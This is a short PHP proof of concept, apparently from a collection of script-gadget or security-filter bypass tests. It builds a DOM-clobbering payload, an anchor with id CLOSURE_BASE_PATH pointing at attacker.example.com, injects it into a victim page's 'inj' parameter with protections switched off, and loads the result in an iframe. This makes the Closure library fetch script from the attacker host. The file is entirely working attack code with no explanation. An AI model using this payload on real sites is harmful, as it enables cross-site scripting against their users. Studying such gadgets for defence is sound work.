<?php
$inj = <<<'PAYLOAD'
<a id=CLOSURE_BASE_PATH href=http://attacker.example.com/shout/index.php/></a>
PAYLOAD;
$url = 'http://victim.example.com/repo/csp/sd/closure.php?csp=0&xssfilter=1&inj=' . urlencode($inj);
?>
<iframe src="<?php echo $url?>"></iframe>
